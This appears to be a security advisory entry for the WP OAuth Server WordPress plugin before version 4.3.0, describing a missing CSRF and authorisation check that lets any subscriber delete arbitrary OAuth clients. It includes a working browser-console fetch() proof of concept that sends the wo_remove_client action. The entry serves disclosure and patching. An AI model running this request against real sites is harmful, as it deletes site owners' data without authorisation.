Lucene search
Lana CodesWPEX-ID:BE9B25C8-B0D7-4C22-81FF-E41650A4ED41HistoryFeb 21, 2023 - 12:00 a.m.
WP OAuth Server < 4.3.0 - Subscriber+ Arbitrary Client Deletion
2023-02-2100:00:00
Lana Codes
60
wordpress
security
oauth server
arbitrary client deletion
developer console
command
exploit
0.001 Low
EPSS
Percentile
20.0%
The plugin has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated users, such as subscriber to delete arbitrary client.
Run the below command in the developer console of the web browser while being on the blog as any authenticated users, such as subscriber, this will delete the client with ID 123
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=wo_remove_client&client_id=123',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
Related
prion
prion
Cross site request forgery (csrf)
2023-03-20 16:15:00
nvd
nvd
CVE-2022-4148
2023-03-20 16:15:11
cvelist
cvelist
cve
cve
CVE-2022-4148
2023-03-20 16:15:11
wpvulndb
wpvulndb
WP OAuth Server < 4.3.0 - Subscriber+ Arbitrary Client Deletion
2023-02-21 00:00:00